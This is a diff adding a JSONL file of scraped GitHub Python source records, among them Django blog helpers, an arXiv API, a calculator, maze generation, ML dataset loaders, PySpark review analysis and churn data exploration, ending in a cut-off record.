diff --git "a/5743.jsonl" "b/5743.jsonl" new file mode 100644--- /dev/null +++ "b/5743.jsonl" @@ -0,0 +1,226 @@ +{"seq_id":"46854921018","text":"from django.template.defaultfilters import slugify\n\nSTATUS_CHOICES = {\n 'Draft': 0,\n 'Pending': 1,\n 'Published': 2\n}\n\nROLE_CHOICES = {\n 'Administrator': 0,\n 'Editor': 1,\n 'Author': 2,\n 'Contributor': 3,\n 'Follower': 4\n}\n\n\ndef has_enough_privileges(actual_level, required_group):\n return actual_level <= ROLE_CHOICES[required_group]\n\n\n# Only used to set publication_date\ndef has_changed(instance, field):\n if not instance.pk:\n return False\n old_value = instance.__class__._default_manager.filter(\n pk=instance.pk).values(field).get()[field]\n return not getattr(instance, field) == old_value\n\n\n# Should be improved\ndef unique_slug(string, target_class):\n slug = slugify(string)\n slug_exists = True\n counter = 1\n output = slug\n while slug_exists:\n try:\n slug_exits = target_class.objects.get(slug=slug)\n if slug_exits:\n slug = output + '_' + str(counter)\n counter += 1\n except target_class.DoesNotExist:\n output = slug\n break\n return output\n","repo_name":"iago1460/lightweight-django-blog","sub_path":"blog/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"12316722513","text":"# ArXivPully.py file\n\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\nfrom falcon import API\n\nclass ArXivPully:\n def pull_from_arxiv(self,search_query, num_results=10):\n url = 'https://export.arxiv.org/api/query'\n params = {'search_query': f'all:{search_query}',\n 'start': 0,\n 'max_results': num_results} \n data = requests.get(url,params=params).text\n soup = BeautifulSoup(data, 'lxml')\n # ArXiv populates the the first title value as the search query \n titles = soup.find_all('title')[1:]\n bodies = soup.find_all('summary')\n links = soup.find_all('link', title='pdf')\n for title, body, link in zip(titles, bodies, links):\n yield {'link': link['href'],\n 'title': title.text.strip().replace('\\n',' '),\n 'body': title.text.strip().replace('\\n',' ')}\n \n\n def on_get(self, req, resp):\n \"\"\"Handles GET requests\"\"\"\n resp.media = json.dumps({search_query : list(self.pull_from_arxiv(search_query, num_results)) for search_query, num_results in req.params.items()})\n\napi = API()\napi.add_route('/api/query', ArXivPully())","repo_name":"evader110/ArXivPully","sub_path":"ArXivPully.py","file_name":"ArXivPully.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"27841503489","text":"#FUNCTIONS WITH OUTPUTS\n# def format_name():\n# f_name =\"Hitesh\"\n# l_name = \"N\"\n# return f_name,l_name\n# result={\"Name\":[format_name()]}\n# print(result)\n#--------------------------------\n# def format_name(f_name,l_name):\n# f_name=f_name.title()\n# l_name=l_name.title()\n# return f_name,l_name\n# f_name =input(\"Fisrt Name:\").lower()\n# l_name =input(\"lower case:\").lower()\n# result={\"Name\":[format_name(f_name,l_name)]}\n# print(result)\n#-----------------------------------\n# def format_name(f_name,l_name):\n# if f_name=='' or l_name=='':\n# return \"Provide Valid inputs\"\n# else:\n# f_name =f_name.title()\n# l_name = l_name.title()\n# return f'Resule:{f_name} {l_name}'\n# print(format_name(input(\"Enter Firstname:\").lower(),input(\"Enter Lastname:\").lower()))\n#-----------------------------------------------------------------------------\n# def is_leap(year):\n# if year % 4 == 0:\n# if year % 100 == 0:\n# if year % 400 == 0:\n# # print(\"Leap year.\")\n# return True\n# else:\n# # print(\"Not leap year.\")\n# return False\n# else:\n# # print(\"Leap year.\")\n# return True\n# else:\n# # print(\"Not leap year.\")\n# return False\n#\n# def days_in_month(year,month):\n# month_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n# if year== False:\n# return month_days[month-1]\n# elif year== True:\n# if month==2:\n# return month_days[month-1]+1\n# else:\n# return month_days[month-1]\n# days = days_in_month(is_leap(int(input(\"Enter a year: \"))),int(input(\"Enter a month: \")))\n# print(days)\n#----------------------------------------------------------\n#calculator\nfrom Calculator_art import logo\ndef add(n1,n2):\n '''Adds two Numbers'''\n return n1+n2\ndef sub(n1,n2):\n '''Subtracts Two numbers'''\n return n1-n2\ndef mul(n1,n2):\n '''Multiplies two numbers'''\n return n1*n2\ndef divide(n1,n2):\n '''Divide two numbers'''\n return round((n1/n2),4)\n\n\noperations ={\n\"+\":add,\n\"-\":sub,\n\"*\":mul,\n\"/\":divide\n}\ndef Calculator():\n '''This fuction will calculate the values for the set of\n operations the user enter and user can also wish to continue\n by:yes or no or refresh accordingly'''\n print(logo)\n n1 = float(input(\"Enter the First Number:\"))\n to_continue = \"yes\"\n while to_continue=='yes':\n for operator in operations:\n print(operator)\n chosen_operator = input(\"Enter the operator:\")\n operation_func = operations[chosen_operator]\n n2 = float(input(\"Enter the Second Number:\"))\n answer = operation_func(n1,n2)\n print(f\"{n1}{chosen_operator}{n2} = {answer}\")\n to_continue = input(\"Do you wish to continue?Type 'yes','no''refresh':\").lower()\n n1 = answer\n if to_continue==\"no\":\n print(\"Good Bye!\")\n elif to_continue=='refresh':\n Calculator()\nCalculator()","repo_name":"Hit07/Python-Days","sub_path":"Day_10.py","file_name":"Day_10.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4328654529","text":"from .maze_algorithm import (\n MazeAlgorithm,\n randrange,\n choice,\n)\nfrom maze_generator.maze.algorithm.helper.priority_queue import PriorityQueue\n\n\nclass Prim(MazeAlgorithm):\n name = \"Prim\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.bias = round((1 - abs(self.bias)) * 10)\n\n self.q = PriorityQueue()\n self.run()\n self.color_cells_by_tree_root()\n\n def run(self):\n start_cell = self.grid.random_cell()\n self.push_to_queue(start_cell)\n\n while not self.q.is_empty():\n cell, neighbor = self.q.pop()\n if not self.grid.connected(cell, neighbor):\n self.grid.link(cell, neighbor)\n self.push_to_queue(neighbor)\n self.push_to_queue(cell)\n\n def push_to_queue(self, cell):\n try:\n self.q.push((cell, choice(cell.get_unlinked_neighbors())), randrange(0, self.bias + 1))\n except IndexError:\n pass\n","repo_name":"Gorgious56/MazeGenerator","sub_path":"maze_generator/maze/algorithm/algorithms/prim.py","file_name":"prim.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"35"} +{"seq_id":"35270239740","text":"encoding='utf-8'\n\nimport csv\nimport os\n\ndict_pm={}\n\nwith open('corpus/metadata.csv', 'r', encoding='utf-8') as f: #or encoding='utf-8' or 'latin-1' or 'iso-8859-1' or 'mac_roman'\n reader = csv.reader(f)\n data = list(reader)\n\nfor i in data[1:]: #column numer 2 in the csv will be noted 1 in here. Pick the column to group by and change lines below accordingly.\n print(i[0], i[1])\n if i[1] not in dict_pm:\n dict_pm[i[1]]=\"\"\n with open(f'corpus/{i[0]}.txt', 'r') as f:\n text= f.read()\n dict_pm[i[1]]= dict_pm[i[1]] + text + \" \"\n\nfor key in dict_pm.keys():\n with open(f'combined/{key}.txt', \"w\") as outfile: #create folder \"combined\" beforehand, or \"os.makedirs('combined')\" to create one\n outfile.write(dict_pm[key])","repo_name":"jtmart/text-processing","sub_path":"workflow/7groupby.py","file_name":"7groupby.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"42004329165","text":"from __future__ import division\nimport numpy as np \nfrom sklearn import neighbors\nfrom sklearn.metrics import accuracy_score\n\ndef knn_val(features_train, labels_train, features_val, labels_val):\n x = features_train\n y = labels_train\n x_val = features_val\n y_val = labels_val\n z = 0\n sumCorrect = 0\n \n knn = neighbors.KNeighborsClassifier(n_neighbors=1)\n knn.fit(x, y)\n y_predict = knn.predict(x_val)\n #y_predict = b.tolist()\n #val_len = len(features_val)\n #print(len(y_predict))\n #print(len(labels_val))\n #print(y_predict)\n #print(labels_val)\n #return\n #tot = 0\n #for i in range(len(y_predict)):\n # if y_predict[i] == labels_val[i]:\n # tot += 1\n\n return accuracy_score(labels_val, y_predict)#float(tot)/len(y_predict)\n '''\n i = 0\n for array in y:\n try:\n temp = array.index(1)\n pass\n except ValueError:\n temp = 9\n if temp == Z[i]:\n sumCorrect = sumCorrect+1\n i = i + 1\n \n accuracy = sumCorrect/val_len\n print(sumCorrect)\n result = [b]\n print result\n result.append(accuracy)\n return result\n '''\n","repo_name":"markelsanz14/Image-Classification-Kaggle","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74359764260","text":"from Data_Loader import DataLoader\n\nclass GSM8K_DataLoader(DataLoader):\n def __init__(self, file_path=\"../dataset/grade-school-math/test.jsonl\") -> None:\n super().__init__(file_path)\n\n def get_comparable_answer(self, answer) -> str:\n return answer.split(\"#### \")[-1]\n \n def get_data(self):\n question_list, answer_list = self.read_jsonl(self.file_path)\n question_list = [question.strip() for question in question_list]\n # string\n comparable_answer_list = [self.get_comparable_answer(answer) for answer in answer_list]\n return question_list, comparable_answer_list\n \nclass GSM8K_Hard_DataLoader(DataLoader):\n def __init__(self, file_path=\"../dataset/GSM8KHard/gsmhardv2_test.jsonl\") -> None:\n super().__init__(file_path)\n\n def get_data(self):\n question_list = []\n answer_list = []\n with jsonlines.open(self.file_path) as reader:\n for obj in reader:\n question = obj[\"input\"]\n answer = str(obj[\"target\"])\n if answer[-2:] == \".0\":\n answer = answer[:-2]\n question_list.append(question)\n answer_list.append(answer)\n return question_list, answer_list\n\nclass SingleOP_DataLoader(GSM8K_Hard_DataLoader):\n def __init__(self, file_path=\"../dataset/SingleOP/mawpssingleop.jsonl\") -> None:\n super().__init__(file_path)\n\nclass ASDIV_DataLoader(GSM8K_Hard_DataLoader):\n def __init__(self, file_path=\"../dataset/ASDIV/asdiv.jsonl\") -> None:\n super().__init__(file_path)\n\nclass AddSub_DataLoader(DataLoader):\n def __init__(self, file_path=\"../dataset/AddSub/AddSub.json\") -> None:\n super().__init__(file_path)\n\n def get_data(self):\n question_list = []\n answer_list = []\n with open(self.file_path) as f:\n json_data = json.load(f)\n for line in json_data:\n q = line[\"sQuestion\"].strip()\n a = str(line[\"lSolutions\"][0])\n if a[-2:] == \".0\":\n a = a[:-2]\n question_list.append(q)\n answer_list.append(a)\n return question_list, answer_list\n \nclass MultiArith_DataLoader(AddSub_DataLoader):\n def __init__(self, file_path=\"../dataset/MultiArith/MultiArith.json\") -> None:\n super().__init__(file_path)\n\nclass SingleEq_DataLoader(AddSub_DataLoader):\n def __init__(self, file_path=\"../dataset/SingleEq/questions.json\") -> None:\n super().__init__(file_path)\n\nclass AQuA_DataLoader(DataLoader):\n def __init__(self, file_path=\"../dataset/AQuA/test.json\") -> None:\n super().__init__(file_path)\n \n def get_data(self):\n decoder = json.JSONDecoder()\n question_list = []\n answer_list = []\n with open(self.file_path) as f:\n lines = f.readlines()\n for line in lines:\n json_res = decoder.raw_decode(line)[0]\n choice = \"(\" + \"(\".join(json_res[\"options\"])\n choice = choice.replace(\"(\", \" (\").replace(\")\", \") \")\n choice = \"Answer Choices:\" + choice\n question_list.append(json_res[\"question\"].strip() + \"\\n\" + choice)\n answer_list.append(json_res[\"correct\"])\n return question_list, answer_list\n\nclass SVAMP_DataLoader(DataLoader):\n def __init__(self, file_path=\"../dataset/SVAMP/SVAMP.json\") -> None:\n super().__init__(file_path)\n \n def get_data(self):\n question_list = []\n answer_list = []\n with open(self.file_path) as f:\n json_data = json.load(f)\n for line in json_data:\n q = line[\"Body\"].strip() + \" \" + line[\"Question\"].strip()\n a = str(line[\"Answer\"])\n if a[-2:] == \".0\":\n a = a[:-2]\n question_list.append(q)\n answer_list.append(a)\n return question_list, answer_list","repo_name":"QiushiSun/Corex","sub_path":"utils/Math_Loaders.py","file_name":"Math_Loaders.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"28217344790","text":"\"\"\" Eczacibasi activity comparison module \"\"\"\nfrom datetime import datetime\nfrom util import date_time, ecz_daha\nfrom model.timesheet.activity import Activity\nimport config\n\nclass EczActivityComparisonAPI():\n \"\"\" Eczacibasi activity comparison class \"\"\"\n def __init__(self):\n self._result = {}\n self._ecz = config.CONSTANTS[\"COMPANY_NAME_ECZ_TUG\"]\n\n @property\n def result(self) -> dict:\n \"\"\" Returns output \"\"\"\n self._result = {\"ThisMonth\": [], \"PrevMonth\": []}\n\n this_year = datetime.now().year\n this_month = datetime.now().month\n self._append_month(this_year, this_month, \"ThisMonth\")\n\n prev_year = this_year\n prev_month = this_month - 1\n if prev_month == 0:\n prev_year -= 1\n prev_month = 12\n self._append_month(prev_year, prev_month, \"PrevMonth\")\n\n return self._result\n\n def _append_month(self, year: int, month: int, elem: str):\n sap_year = str(year)\n sap_month = date_time.get_two_digit_month(month)\n ecz_activities = ecz_daha.get_monthly_activity(p_sap_year=sap_year, p_sap_month=sap_month)\n\n for ecz_activity in ecz_activities:\n date_of_activity = date_time.parse_sap_date(ecz_activity[\"date\"])\n\n kifu_hour_sum = Activity.get_time_sum(client_name=self._ecz,\n date=date_of_activity)\n\n date = date_time.get_formatted_date(date_time.parse_sap_date(ecz_activity[\"date\"]))\n\n entry = {\"date\": date,\n \"comment\": ecz_activity[\"comment\"],\n \"ecz_hours\": ecz_activity[\"hours\"],\n \"kifu_hours\": kifu_hour_sum,\n \"different\": kifu_hour_sum != ecz_activity[\"hours\"]}\n\n self._result[elem].append(entry)\n","repo_name":"keremkoseoglu/Kifu","sub_path":"web/api/ecz_activity_comparison.py","file_name":"ecz_activity_comparison.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32663124050","text":"from django.core.management.base import BaseCommand\n\nimport json\nfrom pprint import pprint\n\nfrom network_ui_dev.models import EventTrace, FSMTrace, TopologySnapshot\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('topology_id', type=int)\n parser.add_argument('trace_id', type=int)\n parser.add_argument('client_id', type=int)\n\n def handle(self, *args, **options):\n topology_id = options['topology_id']\n trace_id = options['trace_id']\n client_id = options['client_id']\n\n data = dict()\n data['event_trace'] = [json.loads(x) for x in EventTrace\n .objects.filter(trace_session_id=trace_id, client_id=client_id)\n .order_by('message_id')\n .values_list('event_data', flat=True)]\n data['fsm_trace'] = list(FSMTrace\n .objects\n .filter(trace_session_id=trace_id, client_id=client_id)\n .order_by('order')\n .values())\n data['snapshots'] = [json.loads(x) for x in TopologySnapshot\n .objects.filter(topology_id=topology_id,\n trace_session_id=trace_id,\n client_id=client_id)\n .order_by('order')\n .values_list('snapshot_data', flat=True)]\n\n with open('recording_{0}_{1}_{2}.json'.format(topology_id, trace_id, client_id), 'w') as f:\n f.write(json.dumps(data, sort_keys=True, indent=4))\n","repo_name":"benthomasson/network-ui","sub_path":"network_ui_dev/management/commands/get_recording.py","file_name":"get_recording.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"10440474415","text":"from PyQt5.QtCore import QObject, pyqtSignal, Qt, QThread\nfrom settings import *\nimport time\nimport random\n\nclass Switch(QThread):\n \n change_val_signal = pyqtSignal(int)\n def __init__(self, port, caja, parent:QObject):\n super().__init__(parent)\n \n self.run_flag = True\n self.button = port\n self.texto = caja\n GPIO.setup(port, GPIO.IN, GPIO.PUD_UP)\n print()\n\n def run(self):\n while self.run_flag:\n boton = GPIO.input(self.button)\n #random.randint(0,100) #\n #self.texto.setText(str(boton))\n self.change_val_signal.emit(boton)\n time.sleep(1)\n\n def stop(self):\n self.run_flag = False\n GPIO.cleanup(self.button)\n self.wait()","repo_name":"codeplaigames/ESANGUI","sub_path":"Switch.py","file_name":"Switch.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35769891095","text":"from django import forms\nfrom currencies.models import ExchangeRate, ExchangeRate_name\n\n\nclass CurrenciesForm(forms.Form):\n currencies = forms.ModelChoiceField(\n queryset=ExchangeRate_name.objects.all(),\n required=False,\n empty_label='CHF',\n label='CURENCIES',\n # widget=forms.Select(\n # attrs={\n # 'onchange': 'currency.submit();',\n # 'class': 'btn-primary dropdown-toggle'\n # }\n #)\n )\n","repo_name":"Nebucatnetzer/webtech_case_study","sub_path":"django/didgeridoo/currencies/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4405478359","text":"from keras.models import Sequential \nfrom keras.layers import Dense,Activation,Dropout \nfrom keras.layers.normalization import BatchNormalization \nfrom keras.utils import np_utils\nfrom sklearn.preprocessing import normalize\nfrom sklearn import metrics\nimport pandas as pd\n\ndata=pd.read_csv('cardio_train.csv', sep=';')\n\ndata = data.sample(frac=1.0)\n\nX = data.drop(['id','cardio'], axis=1)\nY = data['cardio']\n\nX_normalized=normalize(X,axis=0)\n\ntotal_length=len(data)\ntrain_length=int(0.8*total_length)\ntest_length=int(0.2*total_length)\n\nx_train=X_normalized[:train_length]\nx_test=X_normalized[train_length:]\ny_train=Y[:train_length]\ny_test=Y[train_length:]\n\ny_train=np_utils.to_categorical(y_train,num_classes=2)\ny_test=np_utils.to_categorical(y_test,num_classes=2)\n\nmodel=Sequential()\nmodel.add(Dense(1000,input_dim=11,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(300,activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(2,activation='softmax'))\nmodel.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\n\nmodel.fit(x_train,y_train,validation_data=(x_test,y_test),batch_size=20,epochs=10,verbose=1)\n\ny_pred=model.predict(x_test)\n\nprint(\"Sieć neuronowa\")\nprint(metrics.accuracy_score(y_test.argmax(axis=1), y_pred.argmax(axis=1)))\nprint(metrics.confusion_matrix(y_test.argmax(axis=1), y_pred.argmax(axis=1)))","repo_name":"malgorzatasz/io","sub_path":"SiecNeuronowa.py","file_name":"SiecNeuronowa.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70171160421","text":"import sys\nimport time\nfrom PySide2.QtWidgets import *\nfrom PySide2.QtCore import *\nfrom PySide2.QtGui import *\n\nfrom mouse_keyboard import * \n\n\nclass Form(QDialog): # QDialog是窗口类\n \n def __init__(self, parent=None): #没有parent的是最上层的窗口 \n \"\"\"初始化布局\"\"\"\n super().__init__(parent) #父类初始化父类的\n self.setWindowTitle(\"mycopy\") #子类初始化子类的,设置标题\n self.setWindowIcon(QIcon(\"mycopy.jpg\"))\n self.resize(50,50)\n\n # Set dialog layout\n layout = QVBoxLayout()\n\n self.Qtable_id = QLineEdit(\"6.1\")\n layout.addWidget(self.Qtable_id)\n self.Qtable_id.setValidator(QDoubleValidator(6,12,2))\n\n self.Qdown_push = QPushButton(self)\n layout.addWidget(self.Qdown_push)\n self.Qdown_push.setText(u\" 自动下载 \")\n self.Qdown_push.clicked.connect(self.down_push)\n\n\n self.Qcopy_line = QLabel((u'浏1定位math2(4)右上角')) #还能再显示20个字符\n layout.addWidget(self.Qcopy_line)\n self.Qcopy_line.setFrameStyle(QFrame.Panel | QFrame.Sunken) #带凹陷的\n self.Qcopy_line.setStyleSheet(\"color:#FF3333\")\n\n\n Qcopy_grid = QGridLayout()\n layout.addLayout(Qcopy_grid)\n \n self.Qcopy_edit = QLineEdit('')\n Qcopy_grid.addWidget(self.Qcopy_edit, 0 ,0)\n self.Qcopy_edit.setValidator(QIntValidator(0,100))\n\n self.Qcopy_push = QPushButton(self)\n Qcopy_grid.addWidget(self.Qcopy_push, 0, 1)\n self.Qcopy_push.setText(u\" 快速复制 \")\n self.Qcopy_push.clicked.connect(self.quick_copy)\n\n\n Qcopy_plus_grid = QGridLayout()\n layout.addLayout(Qcopy_plus_grid)\n\n self.Qcopy_plus_edit = QLineEdit('')\n Qcopy_plus_grid.addWidget(self.Qcopy_plus_edit, 0 ,0)\n self.Qcopy_plus_edit.setValidator(QIntValidator(0,100))\n\n self.Qcopy_plus_push = QPushButton(self)\n Qcopy_plus_grid.addWidget(self.Qcopy_plus_push, 0, 1)\n self.Qcopy_plus_push.setText(u\" 高级复制 \")\n self.Qcopy_plus_push.clicked.connect(self.plus_copy)\n\n self.setLayout(layout)\n\n\n def quick_copy(self):\n times = self.Qcopy_edit.text()\n times = int(times)\n copy(times)\n\n def plus_copy(self):\n times = self.Qcopy_plus_edit.text()\n times = int(times)\n copy_plus(times)\n\n def down_push(self):\n table_id = self.Qtable_id.text()\n download(table_id)\n\n\nif __name__ == '__main__':\n # Create the Qt Application\n app = QApplication(sys.argv)\n # Create and show the form\n form = Form()\n form.show()\n # Run the main Qt loop直到exit()被调用,即运行程序\n sys.exit(app.exec_()) # 前面的show方法并没有显示,通过此时的层层调用才显示\n\n","repo_name":"awesome-yyh/math_pyside2","sub_path":"mathplus/web/mycopy.py","file_name":"mycopy.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4698454296","text":"#!/usr/bin/env python3\n\"\"\"reviewed_productsSQL.py\"\"\"\n\nimport argparse\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType\nimport time\nfrom datetime import datetime\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.functions import row_number, split, explode, count, from_unixtime, year, desc, length, lower, regexp_replace, col\n\n# Parse the arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--input\", help=\"the input path\")\nparser.add_argument(\"--output\", help=\"the output path\")\n\nargs = parser.parse_args()\n\ninput_path, output_path = args.input, args.output\n\n# Create the SparkSession\nspark = SparkSession.builder.getOrCreate()\nspark.sparkContext.setLogLevel(\"ERROR\")\n\n# Define the schema structure\nschema = StructType([\n StructField(\"Id\", IntegerType(), True),\n StructField(\"productId\", StringType(), True),\n StructField(\"userId\", StringType(), True),\n StructField(\"profileName\", StringType(), True),\n StructField(\"helpfulnessNumerator\", IntegerType(), True),\n StructField(\"helpfulnessDenominator\", IntegerType(), True),\n StructField(\"score\", StringType(), True),\n StructField(\"time\", IntegerType(), True),\n StructField(\"summary\", StringType(), True),\n StructField(\"text\", StringType(), True)\n])\n\n# calculate time elapsed\nstart_time = time.time()\n\n# read from csv file\ninput_df = spark.read.option(\"quote\", \"\\\"\") \\\n .csv(input_path, header=True, schema=schema) \\\n .cache()\n\n# preprocessing, remove html tags and convert to lower case\npunctuation_pattern = \"[!\\\"#$%&'()*+,-./:;<=>?@\\\\[\\\\\\\\\\\\]^_`{|}~<>]\"\ninput_df = input_df.withColumn(\"text\", lower(regexp_replace(col(\"Text\"), f\"<.*?>|{punctuation_pattern}\", \"\"))).cache()\n\n# convert unix_timestamp to year\ninput_df = input_df.withColumn(\"time\", input_df[\"time\"].cast(\"timestamp\"))\ninput_df = input_df.withColumn(\"year\", year(from_unixtime(input_df[\"time\"].cast(\"bigint\")))).cache()\n\n# use sql to calculate the top 10 reviewed products for each year\n# and append for each product the top 5 words used in the text field\n# of the reviews\n\n# calculate the top 10 reviews for each product in each year\ndf_with_reviews_number = input_df.groupBy(\"year\", \"productId\").agg(count(\"*\").alias(\"review_count\")).cache()\n\nwindow = Window.partitionBy(\"year\").orderBy(desc(\"review_count\"))\n\ndf_with_top = df_with_reviews_number.withColumn(\"row_number\", row_number().over(window))\n\ndf_with_top = df_with_top.filter(df_with_top[\"row_number\"] <= 10).drop(\"row_number\").cache()\n\n# calculate the top 5 words for each product in each year\n# split the text field into words\ndf_with_words = input_df.withColumn(\"words\", explode(split(input_df[\"text\"], \" \"))).cache()\n\ndf_with_words = df_with_words.filter(length(df_with_words[\"words\"]) > 3).groupBy(\"year\", \"productId\", \"words\").agg(count(\"*\").alias(\"word_count\")).cache()\n\nwindow = Window.partitionBy(\"year\", \"productId\").orderBy(desc(\"word_count\"))\n\ndf_with_top_words = df_with_words.withColumn(\"row_number\", row_number().over(window))\ndf_with_top_words = df_with_top_words.filter(df_with_top_words[\"row_number\"] <= 5).drop(\"row_number\").cache()\n\n# join the two dataframes\nfinal_df = df_with_top.join(df_with_top_words, [\"year\", \"productId\"]).cache()\n\nend_time = time.time()\n\n# save the output\nfinal_df.write.csv(output_path, mode = \"overwrite\")\n# Print the time elapsed\nprint(\"Time elapsed: \", end_time - start_time)","repo_name":"LeafTeamMates/BigData1","sub_path":"Job1/Spark/reviewed_productsSQL.py","file_name":"reviewed_productsSQL.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11059185289","text":"#! /usr/bin/env python\n\nimport sys\nfrom collections import OrderedDict\n\n\ndef render_golang(matrix):\n result = []\n result.append('{')\n for key1, row in matrix.items():\n if key1 in ('B', 'Z', 'X'):\n continue\n result.append('\\t{}: {{'.format(key1))\n for key2, score in row.items():\n if key2 in ('B', 'Z', 'X'):\n continue\n result.append('\\t\\t{}: {},'.format(key2, score))\n result.append('\\t},')\n result.append('}')\n return '\\n'.join(result)\n\n\ndef text2matrix(fname):\n matrix = OrderedDict()\n with open(fname) as fp:\n [*keys] = fp.readline().strip()\n for key1, line in zip(keys, fp):\n vals = line.split()\n for key2, val in zip(keys, vals):\n matrix.setdefault(key1, OrderedDict())[key2] = val\n matrix.setdefault(key2, OrderedDict())[key1] = val\n return matrix\n\n\ndef main():\n fname = sys.argv[1]\n matrix = text2matrix(fname)\n print(render_golang(matrix))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hivdb/nucamino","sub_path":"scripts/make_blosum.py","file_name":"make_blosum.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"28219943328","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ndataset = pd.read_csv(\"C:\\\\Users\\\\himal\\\\Desktop\\\\Machine Learning Practicals\\\\P4- Minimizing Churn Rate through Analysis of Financial Habits\\\\P39-Minimizing-Churn-Data\\\\churn_data.csv\") # Users who were 60 days enrolled, churn in the next 30\r\n\r\n# EDA\r\n# print(dataset.head(5))\r\n# print(dataset.columns)\r\n# print(dataset.describe())\r\n# print(dataset.isna().any())\r\n# print(dataset.isna().sum())\r\ndataset=dataset[pd.notnull(dataset['age'])]\r\ndataset = dataset.drop(columns = ['credit_score', 'rewards_earned'])\r\n\r\n# Histograms\r\ndataset2 = dataset.drop(columns=['user', 'churn','housing','payment_type','zodiac_sign'])\r\nfig = plt.figure(figsize=(20, 15))\r\nplt.suptitle('Histograms of Numerical Columns', fontsize=20)\r\nfor i in range(1, dataset2.shape[1] + 1):\r\n plt.subplot(6, 4, i)\r\n f = plt.gca()\r\n f.axes.get_yaxis().set_visible(False)\r\n f.set_title(dataset2.columns.values[i - 1])\r\n vals = np.size(dataset2.iloc[:, i - 1].unique())\r\n plt.hist(dataset2.iloc[:, i - 1], bins=vals, color='#FF0077')\r\nfig.tight_layout(rect=[0, 0.03, 1, 0.95])\r\nplt.show()\r\n\r\n# Pie Charts\r\ndataset2 = dataset[['housing', 'is_referred', 'app_downloaded',\r\n 'web_user', 'app_web_user', 'ios_user',\r\n 'android_user', 'registered_phones', 'payment_type',\r\n 'waiting_4_loan', 'cancelled_loan',\r\n 'received_loan', 'rejected_loan', 'zodiac_sign',\r\n 'left_for_two_month_plus', 'left_for_one_month', 'is_referred']]\r\nfig = plt.figure(figsize=(15, 12))\r\nplt.suptitle('Pie Chart Distributions', fontsize=20)\r\nfor i in range(1, dataset2.shape[1] + 1):\r\n plt.subplot(5, 4, i)\r\n f = plt.gca()\r\n f.axes.get_yaxis().set_visible(False)\r\n f.set_title(dataset2.columns.values[i - 1])\r\n values = dataset2.iloc[:, i - 1].value_counts(normalize=True).values\r\n index = dataset2.iloc[:, i - 1].value_counts(normalize=True).index\r\n plt.pie(values, labels=index, autopct='%1.1f%%')\r\n plt.axis('equal')\r\nfig.tight_layout(rect=[0, 0.03, 1, 0.95])\r\nplt.show()\r\n# Exploring Uneven Features\r\nprint(dataset[dataset2.waiting_4_loan == 1].churn.value_counts())\r\nprint(dataset[dataset2.cancelled_loan == 1].churn.value_counts())\r\nprint(dataset[dataset2.received_loan == 1].churn.value_counts())\r\nprint(dataset[dataset2.rejected_loan == 1].churn.value_counts())\r\nprint(dataset[dataset2.left_for_one_month == 1].churn.value_counts())\r\n\r\n# Correlation with the Response Variable\r\ndataset.drop(columns=['user', 'churn', 'housing', 'payment_type',\r\n 'registered_phones', 'zodiac_sign']).corrwith(dataset.churn).plot.bar(\r\n figsize=(20,10),title = 'Correlation with Response variable',\r\n fontsize = 15, rot = 45,\r\n grid = True)\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Correlation Matrix\r\nsns.set(style=\"white\")\r\ncorr = dataset.drop(columns = ['user', 'churn','housing','payment_type','zodiac_sign']).corr()\r\nmask = np.zeros_like(corr, dtype=np.bool)\r\nmask[np.triu_indices_from(mask)] = True\r\nf, ax = plt.subplots(figsize=(18, 15))\r\ncmap = sns.diverging_palette(220, 10, 